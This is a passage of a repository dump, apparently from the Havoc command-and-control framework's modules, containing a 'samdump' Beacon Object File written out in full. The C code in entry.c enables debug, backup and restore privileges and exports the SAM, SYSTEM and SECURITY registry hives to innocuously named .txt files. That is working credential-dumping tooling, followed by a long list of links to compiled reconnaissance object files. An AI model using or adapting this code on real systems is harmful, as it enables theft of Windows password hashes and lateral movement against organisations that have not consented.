packer.addstr(path) 27 | 28 | TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, f"Tasked demon to dump the SAM registry" ) 29 | 30 | demon.InlineExecute( TaskID, "go", f"regdump.{demon.ProcessArch}.o", packer.getbuffer(), False ) 31 | 32 | return TaskID 33 | 34 | RegisterCommand( samdump, "", "samdump", "Dump the SAM, SECURITY and SYSTEM registries", 0, "", "C:\\Windows\\Temp\\" ) 35 | -------------------------------------------------------------------------------- /SamDump/source/beacon.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Beacon Object Files (BOF) 3 | * ------------------------- 4 | * A Beacon Object File is a light-weight post exploitation tool that runs 5 | * with Beacon's inline-execute command. 6 | * 7 | * Cobalt Strike 4.1. 8 | */ 9 | 10 | /* data API */ 11 | typedef struct { 12 | char * original; /* the original buffer [so we can free it] */ 13 | char * buffer; /* current pointer into our buffer */ 14 | int length; /* remaining length of data */ 15 | int size; /* total size of this buffer */ 16 | } datap; 17 | 18 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 19 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 20 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 21 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 22 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 23 | 24 | /* format API */ 25 | typedef struct { 26 | char * original; /* the original buffer [so we can free it] */ 27 | char * buffer; /* current pointer into our buffer */ 28 | int length; /* remaining length of data */ 29 | int size; /* total size of this buffer */ 30 | } formatp; 31 | 32 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 33 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 35 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 36 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 37 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 38 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 39 | 40 | /* Output Functions */ 41 | #define CALLBACK_OUTPUT 0x0 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | 49 | /* Token Functions */ 50 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 51 | DECLSPEC_IMPORT void BeaconRevertToken(); 52 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 53 | 54 | /* Spawn+Inject Functions */ 55 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 56 | DECLSPEC_IMPORT void BeaconInjectProcess(HANDLE hProc, int pid, char * payload, int p_len, int p_offset, char * arg, int a_len); 57 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 58 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 59 | 60 | /* Utility Functions */ 61 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 62 | -------------------------------------------------------------------------------- /SamDump/source/common.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // 4 | // Common Header Includes 5 | // 6 | #include 7 | #include 8 | 9 | // 10 | // Internal "Beacon" API header 11 | // 12 | #include "beacon.h" 13 | 14 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA (HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 15 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY); 16 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyA (HKEY, LPCSTR, LPSECURITY_ATTRIBUTES); 17 | WINBASEAPI BOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE, DWORD, PHANDLE); 18 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (void); 19 | WINBASEAPI BOOL WINAPI ADVAPI32$LookupPrivilegeValueA (LPCSTR, LPCSTR, PLUID); 20 | WINBASEAPI BOOL WINAPI ADVAPI32$AdjustTokenPrivileges(HANDLE, BOOL, PTOKEN_PRIVILEGES, DWORD, PTOKEN_PRIVILEGES, PDWORD); 21 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (void); 22 | WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle (HANDLE); 23 | WINBASEAPI LPSTR WINAPI SHLWAPI$PathCombineA(LPSTR,LPCSTR,LPCSTR); 24 | -------------------------------------------------------------------------------- /SamDump/source/entry.c: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | 4 | void EnableDebugPriv( LPCSTR priv ) 5 | { 6 | HANDLE hToken; 7 | LUID luid; 8 | TOKEN_PRIVILEGES tp; 9 | 10 | 11 | if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) 12 | { 13 | BeaconPrintf(CALLBACK_ERROR, "[*] OpenProcessToken failed, Error = %d .\n" , KERNEL32$GetLastError() ); 14 | return; 15 | } 16 | 17 | if (ADVAPI32$LookupPrivilegeValueA( NULL, priv, &luid ) == 0 ) 18 | { 19 | BeaconPrintf(CALLBACK_ERROR, "[*] LookupPrivilegeValue() failed, Error = %d .\n", KERNEL32$GetLastError() ); 20 | KERNEL32$CloseHandle( hToken ); 21 | return; 22 | } 23 | 24 | tp.PrivilegeCount = 1; 25 | tp.Privileges[0].Luid = luid; 26 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 27 | 28 | if (!ADVAPI32$AdjustTokenPrivileges( hToken, FALSE, &tp, sizeof(tp), (PTOKEN_PRIVILEGES) NULL, (PDWORD) NULL )) 29 | { 30 | BeaconPrintf(CALLBACK_ERROR, "[*] AdjustTokenPrivileges() failed, Error = %u\n", KERNEL32$GetLastError() ); 31 | return; 32 | } 33 | 34 | KERNEL32$CloseHandle( hToken ); 35 | } 36 | 37 | void ExportRegKey(LPCSTR subkey, LPCSTR outFile) 38 | { 39 | HKEY hSubKey; 40 | LPSECURITY_ATTRIBUTES lpSecurityAttributes = NULL; 41 | if(ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,subkey,REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_ALL_ACCESS,&hSubKey)==ERROR_SUCCESS) 42 | { 43 | if (ADVAPI32$RegSaveKeyA(hSubKey, outFile, lpSecurityAttributes)==ERROR_SUCCESS) 44 | { 45 | BeaconPrintf(CALLBACK_OUTPUT,"[*] Exported HKLM\\%s at %s\n", subkey, outFile); 46 | } 47 | else 48 | { 49 | BeaconPrintf(CALLBACK_ERROR,"[*] RegSaveKey failed."); 50 | } 51 | 52 | ADVAPI32$RegCloseKey(hSubKey); 53 | } 54 | else 55 | { 56 | BeaconPrintf(CALLBACK_ERROR,"[*] Could not open key %s",subkey); 57 | } 58 | } 59 | 60 | void go(char * args, int alen) 61 | { 62 | datap parser; 63 | 64 | char buffer_1[MAX_PATH] = ""; 65 | char *lpStr1; 66 | lpStr1 = buffer_1; 67 | 68 | char buffer_sam[ ] = "samantha.txt"; 69 | char *lpStrsam; 70 | lpStrsam = buffer_sam; 71 | 72 | char buffer_sys[ ] = "systemic.txt"; 73 | char *lpStrsys; 74 | lpStrsys = buffer_sys; 75 | 76 | char buffer_sec[ ] = "security.txt"; 77 | char *lpStrsec; 78 | lpStrsec = buffer_sec; 79 | 80 | if (!BeaconIsAdmin()){ 81 | BeaconPrintf(CALLBACK_ERROR, "Admin privileges required to use this module!"); 82 | return; 83 | } 84 | 85 | BeaconDataParse(&parser, args, alen); // Parsing arguments from cna 86 | char * dir; 87 | dir = BeaconDataExtract(&parser, NULL); 88 | 89 | //Enabling required privileges for reg operations 90 | EnableDebugPriv(SE_DEBUG_NAME); 91 | EnableDebugPriv(SE_RESTORE_NAME); 92 | EnableDebugPriv(SE_BACKUP_NAME); 93 | 94 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsys); 95 | ExportRegKey("SYSTEM",lpStr1); //exporting SYSTEM 96 | 97 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsam); 98 | ExportRegKey("SAM",lpStr1); //exporting SAM 99 | 100 | SHLWAPI$PathCombineA(lpStr1,dir,lpStrsec); 101 | ExportRegKey("SECURITY",lpStr1); //exporting SECURITY 102 | }; -------------------------------------------------------------------------------- /SamDump/source/entry_x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/source/entry_x64.o -------------------------------------------------------------------------------- /SamDump/source/entry_x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SamDump/source/entry_x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/adcs_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/adcs_enum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/adcs_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/adcs_enum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/arp.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/arp.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/arp.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/arp.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/cacls.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/cacls.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/cacls.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/cacls.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/dir.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/dir.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/dir.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/dir.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/driversigs.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/driversigs.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/driversigs.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/driversigs.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enum_filter_driver.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enum_filter_driver.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enum_filter_driver.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enum_filter_driver.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enumlocalsessions.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enumlocalsessions.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/enumlocalsessions.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/enumlocalsessions.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/env.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/env.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/env.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/env.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get-netsession.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get-netsession.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get-netsession.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get-netsession.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get_password_policy.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get_password_policy.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/get_password_policy.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/get_password_policy.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ipconfig.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ipconfig.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ipconfig.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ipconfig.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ldapsearch.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ldapsearch.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/ldapsearch.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/ldapsearch.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/list_firewall_rules.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/list_firewall_rules.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/list_firewall_rules.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/list_firewall_rules.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/listdns.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/listdns.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/listdns.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/listdns.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/locale.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/locale.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/locale.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/locale.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netgroup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netgroup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netlocalgroup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netlocalgroup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netlocalgroup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netlocalgroup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netshares.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netshares.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netshares.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netshares.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netstat.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netstat.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netstat.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netstat.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuptime.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuptime.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuptime.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuser.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuser.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuserenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuserenum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netuserenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netuserenum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netview.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netview.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/netview.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/netview.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/nslookup.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/nslookup.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/nslookup.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/nslookup.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/quser.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/quser.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/quser.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/quser.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/reg_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/reg_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/reg_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/reg_query.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/resources.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/resources.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/resources.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/resources.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/routeprint.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/routeprint.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/routeprint.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/routeprint.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_enum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_enum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_enum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_enum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qc.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qc.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qc.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qc.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qdescription.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qdescription.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qdescription.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qdescription.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qfailure.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qfailure.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qfailure.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qfailure.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_qtriggerinfo.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_query.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_query.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/sc_query.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/sc_query.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksenum.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksenum.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksenum.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksenum.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksquery.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksquery.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/schtasksquery.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/schtasksquery.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/tasklist.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/tasklist.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/tasklist.x86.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/tasklist.x86.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/uptime.x64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/HavocFramework/Modules/7a513a7da680c161abe46b65ffdcd2e3dc356246/SituationalAwareness/ObjectFiles/uptime.x64.o -------------------------------------------------------------------------------- /SituationalAwareness/ObjectFiles/uptime.x86.o: -------------------------------------------------------------------------------- 